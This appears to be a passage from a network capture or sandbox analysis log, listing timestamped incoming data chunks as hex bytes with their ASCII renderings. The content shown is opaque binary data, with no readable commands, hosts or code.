                                                                                                                                                            2022-09-29 12:45:05 UTC12818INData Raw: 7d b2 d3 95 02 84 9b c4 03 e7 21 02 d0 92 70 56 57 29 4a 07 d2 88 34 82 41 63 f8 bd d7 a7 05 66 5b 8b 97 6b d5 68 79 24 fd a8 ec 76 b5 29 3d 43 4a 05 16 1a 69 74 44 4c 96 5f 66 79 4e e5 93 66 35 e9 5e f3 62 9b 02 c6 7c 10 18 f2 f1 cf 62 11 71 82 99 07 08 be 56 54 21 ad f6 78 b9 76 c3 4b 80 dc a0 48 d7 ae 21 c7 bd 45 6d 9b 57 60 8b fa 98 10 3f 1f 6f 89 dc e6 45 09 04 2f eb d5 94 e8 74 23 ed ec 76 a1 11 5e 72 dd dd d5 50 78 94 b8 15 81 15 a0 41 5d eb 8b ce e9 6c 25 65 d4 76 5d 9b cd ae 62 c9 67 6b 7d ac 60 3b 00 7e 04 03 db 7a e5 97 d2 4c a7 f1 cb 92 b9 b7 25 62 cf 7d 3f c0 9e 3b 45 5b 87 2f 34 10 fa 8d cd 24 c6 6e e3 dd e8 e3 ba 7f 7d 91 e4 0a 51 fd ca 18 fa 5c 40 2c 1d 98 42 2d 8c 2e c4 26 c2 bb 12 e3 26 4e 33 39 d1 80 62 df a6 6a 54 f7 a8 67 81 69 5b 3d
                                                                                                                                                            Data Ascii: }!pVW)J4Acf[khy$v)=CJitDL_fyNf5^b|bqVT!xvKH!EmW`?oE/t#v^rPxA]l%ev]bgk}`;~zL%b}?;E[/4$n}Q\@,B-.&&N39bjTgi[=
                                                                                                                                                            2022-09-29 12:45:05 UTC12834INData Raw: 1a 05 92 18 30 bc f6 73 a5 11 f4 67 1b 20 cd c9 fc 6b f5 56 ae b3 70 93 b1 9d f2 b1 4e c2 22 60 2e 3b 65 5f c9 7c 77 b9 94 bc 05 33 75 ac 2d ea bb 80 5b b7 d0 5a 76 31 a4 64 23 e9 bc 9a ce f1 d2 62 aa 51 3c 33 32 1f 53 f4 ca ef 4b 13 20 99 2f ef b5 88 dc 19 b6 c9 04 2f 6f d7 b6 e6 e1 14 01 a4 da f0 1b 9c 99 b8 b1 53 7d 00 59 ea 00 c9 9c 01 4f 22 69 fd 6c c1 f5 4d 6a dd f5 ec 75 41 46 1c fc c7 d0 78 3a 3d 9c 4e 1b 37 13 a0 1d 80 85 11 ff 82 f3 cb c0 a7 5b 92 db 0b 71 9b 82 ca 74 c9 21 df 28 6e 80 82 83 a5 94 5c 10 cc bc 20 bb a6 46 ff 92 42 0d 34 d0 d2 fa 9b 2b 63 2c 15 42 39 ca be 05 73 29 1c 83 b0 f5 45 73 0b 46 18 4d 2d 4e e1 64 ee 7c eb d6 34 25 36 4a 89 5d 84 e7 2a db e7 aa f5 07 78 8a 2c e7 98 96 1d a9 37 5b 54 62 51 a7 e1 97 15 96 ad bf 3e 5b 83 8e
                                                                                                                                                            Data Ascii: 0sg kVpN"`.;e_|w3u-[Zv1d#bQ<32SK //oS}YO"ilMjuAFx:=N7[qt!(n\ FB4+c,B9s)EsFM-Nd|4%6J]*x,7[TbQ>[
                                                                                                                                                            2022-09-29 12:45:05 UTC12850INData Raw: 1a 8b ed 3c 52 93 6d b1 4c 91 fd 09 8b 07 56 23 7d 74 a9 dc e0 18 d4 f4 3f f5 4f ad f8 c5 20 23 66 34 33 aa c5 76 19 f9 2f 5b d3 0f 24 3b 1e bc 10 7e ec 94 84 b2 6e 26 5a ff 04 b9 07 4d 41 8c 96 f8 33 3e e7 51 1d 3e e6 54 69 42 8e 1c cf ba 2e 03 94 76 4d e3 4f 77 d2 75 57 ae 1a 25 e6 80 7a a8 05 72 21 cd 54 dd 27 0b ad ac 55 b4 c5 47 3f 54 c2 95 b0 5c 97 9c 5c c1 ab bb 6d 00 39 45 c8 47 53 e6 2f 60 6c 97 3a 9d 9b 2d 4a 37 8c e2 bc 4b 47 80 00 78 ca 79 01 67 99 b7 35 19 b1 c4 4b 87 04 bb b5 4b c7 92 db 94 cb 59 b0 8c ea c9 f9 96 13 fe 95 8a c2 5c ad 0c e4 b8 64 2d 93 cb 73 60 d0 bb cf 05 77 36 ce 81 e4 fd 02 65 fa b1 75 f5 38 44 27 13 92 f4 3d 82 25 40 1e d6 db 70 57 9c a9 04 2e 1f 07 11 5b b8 5c 85 c0 96 91 eb c2 ae 05 25 84 8b fa 1c dc 69 be 07 70 22 51
                                                                                                                                                            Data Ascii: <RmLV#}t?O #f43v/[$;~n&ZMA3>Q>TiB.vMOwuW%zr!T'UG?T\\m9EGS/`l:-J7KGxyg5KKY\d-s`w6eu8D'=%@pW.[\%ip"Q
                                                                                                                                                            2022-09-29 12:45:06 UTC12866INData Raw: a3 e0 69 7b f9 68 de f3 65 c8 64 c8 4e 9e 6b 97 26 87 4c cd 58 dd 8c 58 a8 0d 9b dd 06 68 81 0f 80 d5 73 43 be e1 3c 9a 14 2d eb 13 d9 d6 42 bb 8b b0 0a ab fb 8b 6d 30 98 58 34 58 a8 72 46 2b 39 1c e5 8f 18 8b 80 88 c7 ac af 3b cf 4b 50 95 ef ab 18 e4 db e2 9d 38 b0 68 cf de b3 a1 45 fa 6e 99 82 24 5d a9 31 68 72 26 cc 52 c4 44 00 9b 16 ad a2 73 f2 bb 8a 3c 13 d5 c8 93 38 95 0c 89 a8 ee 12 91 e1 8b 64 7b 01 6a 4d 78 01 a2 2a 10 03 66 4f a1 a4 67 6f 32 3b 59 d9 6b 9a 71 fd 48 ea 08 22 a4 b0 8b a9 c5 28 48 af 7c 28 68 6c 0f 25 ac 81 c7 f6 91 4f 71 71 24 2b 77 1c 8a 64 ff 2b d8 be 49 50 7b 25 22 dd 8d e8 7f b1 1f 74 fa cb 7d 50 38 6f 42 47 09 6b d2 20 4e 7c 75 f5 09 3f 30 6f 82 30 eb 40 06 32 a6 4e bd 3f 4f 7c 30 c5 ca be b8 3f f5 15 60 75 e0 7e 2f 1d e4 29
                                                                                                                                                            Data Ascii: i{hedNk&LXXhsC<-Bm0X4XrF+9;KP8hEn$]1hr&RDs<8d{jMx*fOgo2;YkqH"(H|(hl%Oqq$+wd+IP{%"t}P8oBGk N|u?0o0@2N?O|0?`u~/)
                                                                                                                                                            2022-09-29 12:45:06 UTC12882INData Raw: a7 3f 34 7c 8a 70 f4 f3 5a 4a ee 13 75 f0 ac 4d 1b e5 cc 23 f6 1e 3a d5 60 90 4b 58 04 53 ef c5 c2 9d 8f 20 91 dd 65 4f 00 ca e7 d8 e8 0f 3b 47 38 7a 27 cc f3 32 52 cd 88 40 a3 0d e8 26 d0 9c a5 34 d5 0a b7 79 c3 cd 68 58 0c 32 40 a6 42 15 93 76 c8 9b 10 aa 58 5e b3 ad 7c 37 85 dd 98 4e f8 c7 8d c1 5d 3a f0 c0 14 47 b2 5b 94 d0 0e 0c 9a 0d 33 55 1b 30 38 b4 3b 59 83 91 9f fd 70 5d 86 35 3a cb 2c 74 71 3c 93 3d 3f 53 dd a4 31 60 45 28 f4 c2 78 bc 36 22 fb e0 a8 07 97 44 d1 6a 63 19 f2 2d 74 16 70 13 c5 11 f5 58 b8 85 18 a2 09 8b 9c cc 13 5f da 02 bf 2f f0 c7 56 bb 80 b2 ca ff de c0 5a d5 88 44 8d fc 08 c8 1c b4 ce 4c 28 7a 63 67 da f0 6f 7d e5 07 a9 35 91 2e 75 61 77 03 c8 fb 92 ee c5 aa a2 41 fe 83 fa ad 15 7d bc 52 25 f2 7e fd ef a7 93 66 7a b3 4b 1c c4
                                                                                                                                                            Data Ascii: ?4|pZJuM#:`KXS eO;G8z'2R@&4yhX2@BvX^|7N]:G[3U08;Yp]5:,tq<=?S1`E(x6"Djc-tpX_/VZDL(zcgo}5.uawA}R%~fzK
                                                                                                                                                            2022-09-29 12:45:06 UTC12898INData Raw: 6e 60 5b 61 65 99 54 3c 34 a8 1f 21 c5 7b 11 b8 2d f6 55 0e 22 3a f9 ee 1a 86 8d a7 dd 95 07 89 70 5a 99 c1 7b 8c e2 be a7 58 60 b6 54 c4 3e a0 01 88 08 a7 aa 97 c7 a7 6d 8f a6 16 39 57 dc bd fd 6a 66 27 d6 47 82 a8 42 16 df 43 03 27 eb 42 eb 66 5e 2f c3 9c 9c 78 13 c5 81 74 a9 70 1b 5f 23 4e 5d ec 67 50 eb c2 19 8d 3a 50 82 55 8f 28 bc 9a 87 a4 18 8d 12 5c 72 31 a1 e8 d3 f0 bc 80 6f ed 87 66 2a 64 6d 7e ce b2 e6 bd f5 6f d9 44 3a f5 1a 13 04 ce b0 a9 12 ed 27 57 56 33 b9 79 c6 93 4b e7 bb 89 b4 45 df b6 03 c3 11 86 4f 1c 55 8e db ff 09 92 b9 35 5a 98 b0 6a 71 0a c1 03 df 0f 53 ad 86 90 69 d4 f9 1c 09 f6 b2 7d 68 0d 99 c5 55 89 20 bd 7e ec 7b c6 43 ee bf 1f 0c d8 6d 12 11 a4 66 87 5d 93 4c 77 a9 9d ef aa 2a dd e3 19 dc 23 ec c2 80 6b 71 4a 14 5f c8 df 8d
                                                                                                                                                            Data Ascii: n`[aeT<4!{-U":pZ{X`T>m9Wjf'GBC'Bf^/xtp_#N]gP:PU(\r1of*dm~oD:'WV3yKEOU5ZjqSi}hU ~{Cmf]Lw*#kqJ_
                                                                                                                                                            2022-09-29 12:45:06 UTC12914INData Raw: c2 ed fd 66 13 41 3d a3 0f 74 3d 40 ac c3 2d 62 f7 18 81 21 6a 40 41 a6 f8 a4 1e d1 e8 84 63 f3 be da e0 61 0b 40 40 87 b5 97 0a 60 1b 58 9b 04 3f 6f d9 65 47 c2 7c a9 57 b7 14 95 70 70 c4 53 88 ff 5b 42 5e ac b3 f3 b1 d6 79 d2 eb 01 d4 e5 6b d2 07 c3 03 32 72 e2 33 b5 fe 81 99 20 07 01 fa a1 ce 22 49 e0 02 53 b0 cd 39 dd 28 df d4 1c 71 48 65 fe 51 ef 28 c9 38 84 44 18 e6 3c d5 bd d8 19 9f e6 11 7c b5 0d e5 95 40 f0 a9 38 47 d1 72 78 ae 19 44 01 5e 85 a7 53 1d 12 22 90 bf a3 c6 11 33 3a 08 d5 70 7f 2e 27 45 7b b7 de 93 47 8a 1c c0 10 d2 cb 09 1f 5a fa ff 2b 68 75 9e 7d a7 3d 5d bd 27 d1 a7 fc 21 56 7d fb 95 05 8d cd 8c 96 da 11 db 81 55 6e 16 d9 3f e7 bb c4 e9 fd c9 03 3a e1 b2 fb b4 9b 21 88 15 c1 58 7a 71 38 d5 93 ec 59 18 a7 57 25 c1 a3 35 68 5d 37 17
                                                                                                                                                            Data Ascii: fA=t=@-b!j@Aca@@`X?oeG|WppS[B^yk2r3 "IS9(qHeQ(8D<|@8GrxD^S"3:p.'E{GZ+hu}=]'!V}Un?:!Xzq8YW%5h]7
                                                                                                                                                            2022-09-29 12:45:06 UTC12930INData Raw: 7b 70 8e b1 05 37 30 6c 92 74 55 72 23 95 4e 8d fe 88 aa 61 6f d8 42 8f f9 98 5b 93 da 80 2e 63 02 5d 3a 28 be 5d fa cf 0d e1 d7 4a 03 02 00 96 9a c6 e3 ef 9b ec 3f 02 a9 bf 6a 19 10 2b 26 8d 9b 99 44 68 28 f9 42 7c 63 c0 d6 29 45 fc 9b 35 bb 1c 68 61 86 02 d0 d3 bf 72 f3 97 e4 b8 d4 19 78 d1 4b 6e 0d 14 08 d1 b5 6c 9e 87 3d 83 5e 8e f7 1b 31 bf e9 30 a9 65 53 10 34 2d 30 77 51 df c6 49 cc 66 36 ca 43 0f 29 ac f4 f6 c4 65 96 3d d4 46 af 78 86 e5 86 a1 d0 bf bd b1 cd 50 b1 a7 fe 4e d5 66 8d db 8c 9b d6 7e 65 4d 83 1b c5 38 7e be 44 fe 11 36 e5 4c 46 a8 17 b0 12 03 7d 5a df f7 be 8c 0d 83 f3 d3 86 83 b9 b3 40 38 ae 22 d2 fd 94 c1 55 11 58 32 4c 50 53 20 ab bd 75 20 c8 a2 5e 44 01 e3 ee 93 a5 9c 16 25 bc df c4 e6 d0 aa 57 1a 98 47 08 bd 14 8a 29 ac d1 42 a9
                                                                                                                                                            Data Ascii: {p70ltUr#NaoB[.c]:(]J?j+&Dh(B|c)E5harxKnl=^10eS4-0wQIf6C)e=FxPNf~eM8~D6LF}Z@8"UX2LPS u ^D%WG)B
                                                                                                                                                            2022-09-29 12:45:06 UTC12946INData Raw: be de 2a 02 db 6f 20 7f eb 35 eb 7c 5a 4e 77 b0 ae f4 c8 83 47 49 d2 17 12 fb da 7f 91 6c ab 56 23 99 70 77 f4 72 c4 a4 ab 9e 84 ab ee d1 5e 0e f6 41 aa 05 2e 9b c7 09 ea 12 96 73 cb 35 2e fd c0 9a 02 05 9e 22 df b0 3a 2c 36 8b be 2c dd 97 ca 98 02 8e 67 17 b9 38 45 39 88 f4 0d 96 5e ca c4 8e 41 90 c2 b0 4e ed f6 be bb e4 10 1f 31 45 8f 3c a7 bd be a5 e9 b8 b9 8c db 87 84 c3 5b 2c a3 87 ec 0a fe 73 40 9a 07 23 bf d9 d6 6e d1 ab 23 f7 28 f4 a7 86 23 21 60 4c 39 27 af 2a b9 a6 af b1 d8 af 33 ea 5b 32 03 bf 8d 05 84 f7 47 98 85 c1 c3 c6 0b 08 11 5a 9b ef 11 43 2d de 1f d8 52 8b 5a 72 33 69 7f 5a a0 05 65 98 0e 12 ce 2e d5 09 03 c6 cf b8 8e c3 db bb 82 78 2a 0b 7c 38 7e 92 9c f6 26 7b 89 1f 88 a9 84 68 f9 57 d0 e6 4f 30 3b fc 8c d8 92 68 f1 cb 95 60 10 8d 3f
                                                                                                                                                            Data Ascii: *o 5|ZNwGIlV#pwr^A.s5.":,6,g8E9^AN1E<[,s@#n#(#!`L9'*3[2GZC-RZr3iZe.x*|8~&{hWO0;h`?
                                                                                                                                                            2022-09-29 12:45:06 UTC12962INData Raw: bd 4e 69 e5 29 1f 29 84 3b 59 f7 17 79 52 a7 03 11 28 12 24 0b a3 dc 95 27 11 f5 13 47 0e e3 72 c3 9f df 6e d1 ec ed da 5a 6a 17 50 d2 22 16 86 ba cf ce c1 9a c0 19 ad f4 97 bc a8 95 83 b1 8e ae 8a bf 55 7e 9c e7 d1 e5 f0 4a a3 e9 b9 09 27 95 ab d3 30 d2 f3 af 0b b1 b7 0a 5d 1c de f8 25 85 3f 94 7d cf e5 8d 69 ec 4d c1 e0 6e de 64 89 75 b6 42 d5 9d 52 78 a0 8f 35 c3 d0 fa 67 8f cf 9e 23 ac bd 1a 56 a1 d5 9a 31 c2 16 ca d1 87 60 7f e6 60 be 50 4d 67 4f 48 55 85 d7 63 14 13 28 53 fb ea a9 de 9d 56 40 b2 d6 da 6d a7 d8 ef 4e 43 80 38 d7 70 a3 74 a8 83 1e ce f7 45 f5 26 b4 1f f5 44 42 1c 9b 53 9c 97 f5 88 c1 bf 48 33 18 2f 45 33 8f bd fa 9f 28 5e c1 89 c9 75 03 be e3 4c 0a 7e f6 dd f2 8c 5d a7 05 46 7b 60 c2 81 02 fe 9d e1 64 e6 39 d2 d4 fd ed 0a f0 15 dd 9f
                                                                                                                                                            Data Ascii: Ni));YyR($'GrnZjP"U~J'0]%?}iMnduBRx5g#V1``PMgOHUc(SV@mNC8ptE&DBSH3/E3(^uL~]F{`d9
                                                                                                                                                            2022-09-29 12:45:06 UTC12978INData Raw: fa a4 22 5f c9 96 2f 8e 29 85 ca cd ca 2c 9d d5 9e 6a 84 45 ff e0 9c f8 53 60 9a dc c5 56 09 a8 08 6c 8b 46 77 5d 59 9c 1e 1e 72 cb 90 8e 9c fa e0 4a 1d d1 51 74 db 9e 76 51 4e f8 2e e0 2f 79 7b f3 1f 12 89 52 91 70 75 3e 00 eb 92 7c 06 3c e3 58 d1 d3 45 e0 cc 6d 8c 74 52 39 e7 bc 26 65 e0 a9 e1 97 b9 64 7e 8b 14 37 af 3b 84 bd ab e8 1e 37 47 79 f1 50 8f a1 d8 c1 1a e4 6b 8b 39 f4 88 01 b6 61 0b 02 a5 06 c7 2a 95 46 9d ba d5 81 a2 7f 52 93 e2 16 66 b2 49 49 dc 78 da f4 4c 0c f5 e1 bb 37 17 34 67 ba 76 50 1d 13 00 43 6a c2 e3 91 c7 91 02 5d c1 c9 26 36 64 ff de 34 6b a9 a9 64 a5 99 e9 63 59 23 98 f9 9f 0f 8f e9 a3 6f e0 a8 1a 19 18 e6 c5 ba 45 0e 00 96 f1 89 21 4f 21 ef 5e 9a dd 2b c5 5e 76 6e ec f9 43 83 cf 13 e1 9d 97 8a 3c aa e3 25 d2 92 7d 4f df 69 db
                                                                                                                                                            Data Ascii: "_/),jES`VlFw]YrJQtvQN./y{Rpu>|<XEmtR9&ed~7;7GyPk9a*FRfIIxL74gvPCj]&6d4kdcY#oE!O!^+^vnC<%}Oi
                                                                                                                                                            2022-09-29 12:45:06 UTC12994INData Raw: ea 19 e6 0b 06 c2 53 96 ff e6 5d cc 51 0b c2 20 a1 27 02 c4 90 f2 44 0f 15 6a 3f 35 1a fe 2f 9d 4a 8d 8c 8f 79 68 aa 16 5e 1b 3d 0c 3a 44 2e 14 92 07 9f b4 ae d1 e6 0e 8d bf 65 dc b0 65 b0 9b 21 ba ee f6 3d d1 ca 8c a5 be 8b 35 82 9e 81 43 76 e5 51 f4 84 19 b8 52 c4 84 6c 05 4e 62 26 a3 0f f4 7b 85 d6 bc ae 8b d3 ac a0 86 f9 fb 42 a7 ea f0 e2 ae 44 1b 27 37 3c 17 c4 f8 04 87 eb 0a 99 eb 85 91 5d 85 84 20 0f cf 1e 59 dd 26 bf 6e 56 ea 8d ae 59 d0 b4 0d 49 c4 d5 74 52 89 ab 11 8e 82 c7 ec a6 78 1e 1a 40 c7 11 bc 53 aa ca c1 56 ff 9b 4c eb 9b 4d ba d3 46 a3 38 3c 3f e5 7c 1f 45 e9 15 96 b9 87 b7 c3 e6 af 6d 03 28 69 9c f5 bf 5e 58 65 f7 2f 3a 45 cf bd 05 ed 9b 9f 78 1d 26 3d 87 fa d6 d6 99 1d 45 cd 4e 2a 21 09 21 4d 8e 95 a8 db 1f f8 3d 66 ac 90 8a 43 42 92
                                                                                                                                                            Data Ascii: S]Q 'Dj?5/Jyh^=:D.ee!=5CvQRlNb&{BD'7<] Y&nVYItRx@SVLMF8<?|Em(i^Xe/:Ex&=EN*!!M=fCB
                                                                                                                                                            2022-09-29 12:45:06 UTC13010INData Raw: 8b 33 9a c7 48 4d 0a 41 fb 32 36 0e 51 24 b0 74 5b 11 ce ab 2b 37 10 3a d8 5c a8 b6 28 89 1b 60 2b ac 83 7d 6e 2b bc 0e cf 5e 91 23 57 1a 5e 41 ea 94 8d 12 fa ae 77 7d aa fe af 6e f0 7d 22 fd 94 61 e6 a3 5e d3 f3 6a 22 89 dd 85 8a 4f dc a9 4f ef cd 54 f5 77 dc 9c ca 9c 41 e6 67 29 6c 5f 0d b6 70 4e 46 3f ea 7f 03 7b 6d 2a 69 9d 47 4b 60 94 93 d7 66 cf 42 83 fb 46 9d 8e 04 a1 43 73 ee b4 e0 14 ca a0 9b 3a 4c 0b 04 ef 2c 20 a6 a9 5f 0d bd b2 06 d1 b3 13 57 0c 83 4a ed 92 20 ca 25 ed 11 69 cf 9f cf a0 23 95 e7 66 c4 c7 c1 e9 4f 93 3a 1a c1 6b 10 88 dd 32 9b 27 e2 e1 8c 1b fa 0c e7 90 0e 8b 4c b5 a7 4d 78 bc 8a 45 9e f9 f3 0e b1 b3 10 83 fb b0 44 3f cc 34 0c 91 1f ad e0 0a 07 2a 88 d3 cb 89 1e c4 8a 02 62 8c e9 6a b9 fe 0d a8 38 74 a0 11 86 dd 28 e6 c2 5c 97
                                                                                                                                                            Data Ascii: 3HMA26Q$t[+7:\(`+}n+^#W^Aw}n}"a^j"OOTwAg)l_pNF?{m*iGK`fBFCs:L, _WJ %i#fO:k2'LMxED?4*bj8t(\
                                                                                                                                                            2022-09-29 12:45:06 UTC13026INData Raw: 34 04 59 94 0c 27 69 83 ab 66 04 85 b7 0f b2 ef 87 7e 61 33 2f ee 36 4c 40 a3 9e 48 12 89 f8 a1 da 3d 54 cf a8 2e 61 09 db 7d 99 50 d2 c0 03 45 f2 b4 7b 48 81 40 eb 97 b7 54 fc e6 ad 8d f1 ec 4c d6 96 c2 e0 12 6f e4 19 95 50 e7 11 ff 35 0a 19 77 b2 87 65 4e 42 02 39 cb 1f 80 ba 51 f6 92 87 c5 36 a1 be 55 dc a8 81 d0 00 85 66 31 d2 53 ae f2 d6 25 6c c6 b0 01 57 4b d3 2b 76 72 84 17 81 c3 81 cb c1 08 89 94 e6 7d 8b 56 9c ba 32 c1 af 81 9e 1f 60 c2 68 d9 8d b3 9a 30 dc ca a7 67 46 a3 3f 5e 98 79 4f 00 23 99 25 13 d3 27 20 e0 d5 64 fd 76 62 b5 72 ba d8 71 90 85 b2 bb da 8a 6c 0d 18 ef 73 ce 00 36 54 ae 59 e7 c9 40 95 89 f9 40 43 6e 00 b1 91 b3 b2 25 11 99 5f bc f5 08 76 7a 07 ae ee 8e 0a 19 ca dc c3 b7 dd 8c 62 36 41 12 e9 d7 d1 56 53 7c f6 1d 9f 27 f0 a4 10
                                                                                                                                                            Data Ascii: 4Y'if~a3/6L@H=T.a}PE{H@TLoP5weNB9Q6Uf1S%lWK+vr}V2`h0gF?^yO#%' dvbrqls6TY@@Cn%_vzb6AVS|'
                                                                                                                                                            2022-09-29 12:45:06 UTC13042INData Raw: 22 66 96 e6 b5 00 81 eb 05 d6 72 8d 10 cb 79 b2 d9 31 a0 75 31 33 a4 5e 92 fa e0 07 88 d3 25 8e bc e7 1c 8a 4f 23 e5 fd 4b 0d a8 99 51 34 fd b3 ba 1c bf 0d fc 6b fb ab 1b 51 f8 a4 11 bc 8b 5e 80 67 f4 a8 f7 88 0c 4a 81 a1 88 78 97 00 3f 94 ba c4 14 5d 2e 66 e0 43 e9 c2 8d a3 83 6a 75 da 5a b7 9a 93 f8 1d fc 5a 65 a6 71 42 76 6e dc b9 e6 f5 b1 60 79 3c 89 5e 1b 6f e4 37 57 a6 e3 e8 d8 cf 87 f2 e1 30 07 15 31 4f 92 c4 e9 75 71 6b 73 e1 ee 24 99 fb 58 b1 57 71 ab 42 a0 f7 88 d4 5b 8e 15 e1 29 4f 78 59 f1 84 93 30 34 23 71 e6 1a 0d dc d9 a2 8b aa 5d 56 70 cd 91 d8 e9 43 e8 79 99 ac 43 3b 7d 0b a1 39 a0 47 9d ae 6f 72 8e 7d a7 82 d7 fa e5 c2 d6 2a ee bf 12 04 70 0f af ee ea c0 e6 de 82 e8 c9 d6 c6 a1 ca 83 d0 da 08 8f 3f 9a f7 af 35 19 dc 5d 73 0e a0 8e 56 be
                                                                                                                                                            Data Ascii: "fry1u13^%O#KQ4kQ^gJx?].fCjuZZeqBvn`y<^o7W01Ouqks$XWqB[)OxY04#q]VpCyC;}9Gor}*p?5]sV
                                                                                                                                                            2022-09-29 12:45:06 UTC13058INData Raw: a8 39 24 9f c1 70 65 34 4b 34 c6 0c 9f f1 db 19 cf 7d 5c 5f cb 01 2d a9 e9 e4 df a9 14 8f 13 5a 17 73 97 9f 3a fa 32 e8 c1 20 19 f8 3a 5c 23 6a e7 31 90 27 3a 4d 1a cf df 23 f1 ac a6 f5 f2 9b bd f8 14 ac 12 f9 40 fc 5d e4 01 e8 9d 6e 28 fe 8a 04 73 ca ff 34 15 1d e1 af 29 4d d2 ad 10 73 20 99 d9 cf 11 e6 a0 de 09 65 c3 47 12 fd 3c e2 bc c0 c3 3f 7b 48 a4 c9 81 8b 6e b1 8c 13 5b 2d df 36 af 20 fe 74 6b 89 73 9a 89 03 16 cb ad 88 30 96 e6 95 02 2e cf d2 d3 18 4c de 9c ef 2c a3 98 50 ee 72 ce 6d 8f 2e a2 d2 e3 5b 64 95 2d 52 db a8 b3 51 91 8e a0 1c 46 00 46 da cb dc 48 a8 62 1b 9d 58 14 7d 82 48 7d 23 0d a9 16 20 e2 68 55 21 2a e0 be 70 a0 bd 23 c1 45 7c 22 55 9e 04 44 3e 79 44 ab e6 e4 bf d6 5f 72 15 8f 15 ed d4 6f f1 73 8f b5 ee 38 f6 8c c9 e3 59 e1 30 51
                                                                                                                                                            Data Ascii: 9$pe4K4}\_-Zs:2 :\#j1':M#@]n(s4)Ms eG<?{Hn[-6 tks0.L,Prm.[d-RQFFHbX}H}# hU!*p#E|"UD>yD_ros8Y0Q
                                                                                                                                                            2022-09-29 12:45:06 UTC13074INData Raw: b3 72 01 e3 ff 74 57 2d 46 8c c0 66 06 e7 be 0c dd a3 bd f3 6f 91 6a 5c ed 29 17 dd 35 37 fa 5e 9a 16 49 e9 98 ba b1 1d 0a d3 08 21 c1 f6 88 27 72 56 1e 45 0c a5 d6 6a 04 7a 3c 26 54 90 9b a8 ca 20 6c 54 2d 76 9d 8c 1b de 7d eb fd 8e 93 8b 98 aa ac 7f c0 d9 06 1e d8 f1 6e 28 13 bf 76 42 34 18 b0 89 26 ec 12 02 c5 ab 89 1f 0c 78 4c 52 81 71 c5 7f 89 1c 3c 74 07 f1 bd ed 4b 73 b9 d4 a8 54 59 47 65 96 34 e3 ce 56 d0 0f d8 40 e3 99 d7 79 ee 45 e2 21 35 65 6e 17 25 9e 05 9a 4e 60 c4 37 b4 53 f0 c2 0e 98 fd ab 97 10 00 63 c9 06 a8 ac 75 bd ea ab 9e 19 fd c4 7a 4c 92 16 b4 e5 06 cd 18 48 b5 f7 ed 98 43 5f 08 9c d3 41 67 52 2b 4a de 45 ea 80 7d b1 5e 85 9a cd ef f3 bb b3 bf 80 bd 12 a8 aa d0 27 38 8e 9f fd 27 68 2e 98 6c 1e 46 ee 16 d3 3d 87 28 14 e4 98 5d 8f e9
                                                                                                                                                            Data Ascii: rtW-Ffoj\)57^I!'rVEjz<&T lT-v}n(vB4&xLRq<tKsTYGe4V@yE!5en%N`7ScuzLHC_AgR+JE}^'8'h.lF=(]
                                                                                                                                                            2022-09-29 12:45:06 UTC13090INData Raw: d3 db 96 1c 45 88 3e f8 02 75 fd 27 ae 5b e2 bb 89 d4 40 3a 7b cb 3a 74 f2 7b d1 71 2d 7d 78 95 13 03 4b a1 cb 3b b7 ce 48 b2 9b 2e 49 35 07 63 c0 1c 2a 3b 1d d1 bf 5c 12 14 6e a3 08 18 3f 44 36 0a e0 b4 ba 48 85 ef 4e a5 ab 1e d3 e8 2a 6f a1 63 5b 5e 7d fe 28 f3 d1 cf af d7 ec 9c 65 db 81 5a 4a fa 49 01 f4 8f 9f eb 42 3a 75 e2 4b bf 3d f2 da e7 d7 36 4b ce 75 f9 db ee 97 2e 31 c6 28 c5 f6 77 96 22 70 9d 5d 7d e2 05 16 6d e7 be 0e df 83 5a 50 c7 52 57 d2 b0 e6 71 ad 44 3d e9 66 8c ca 76 fb 15 d9 e7 44 8b e0 4d 5a 74 a9 69 f2 28 f1 24 c0 c4 ad 93 45 11 fe fc b3 f3 b1 67 0b be e2 62 f9 6d b3 65 6a f4 e1 28 19 3f 30 8c 5d e2 27 91 b9 a9 b4 ac b5 0a 1a 8c 4c 20 d8 08 65 d9 1d e9 5b 31 6e a6 6c 30 ba 13 64 51 9b bc cd f6 9e 02 e9 1e 09 b0 a3 61 be 76 ba c1 c2
                                                                                                                                                            Data Ascii: E>u'[@:{:t{q-}xK;H.I5c*;\n?D6HN*oc[^}(eZJIB:uK=6Ku.1(w"p]}mZPRWqD=fvDMZti($Egbmej(?0]'L e[1nl0dQav
                                                                                                                                                            2022-09-29 12:45:06 UTC13106INData Raw: 00 88 a0 04 4e 2b 9a a6 22 1a fc d9 77 70 7d e7 ae 91 ef 6c 9c 66 e5 32 1b d0 ac 3e 8c 72 d1 42 f9 31 6c 0d 85 da dd bf 49 15 70 74 1a 4a ae d5 64 fc cf f0 36 70 a2 4b 7c b0 ee b9 d9 ae 12 30 37 1f 7d 84 2c fa 83 cf 26 aa 67 50 35 57 64 9c a5 0e 9e 8f ec 6a bf a7 d2 ec 31 5b 5d 16 1f e8 d4 40 11 75 fa ed 8b 0b 44 e0 82 59 a2 5f da e7 ba cc dc 76 f8 39 50 94 c7 ed eb 1c c2 fd 29 f8 db bf 54 fd 56 b1 8a ab e3 ff fa 61 0b c3 57 d3 bd 4b c8 5b ce 45 af eb 5c bc ca 8e 21 39 98 8f a9 aa 31 29 8e d3 a7 27 1a b8 e6 37 ee 4d 40 c5 15 e6 9e 46 a1 fd f2 ef bb 7c 50 ad f8 19 e8 db 9f b5 a0 e8 b6 51 80 20 d3 ad 62 0f 72 62 14 44 ba 75 09 de 42 f2 ff e4 9c 16 4c 72 98 29 32 0c 25 bd bc 3d 98 9c 9d e6 39 f3 8c 76 5f 0a 55 9f a8 2a 77 db c3 28 79 31 d9 67 f5 c7 c5 c7 d6
                                                                                                                                                            Data Ascii: N+"wp}lf2>rB1lIptJd6pK|07},&gP5Wdj1[]@uDY_v9P)TVaWK[E\!91)'7M@F|PQ brbDuBLr)2%=9v_U*w(y1g
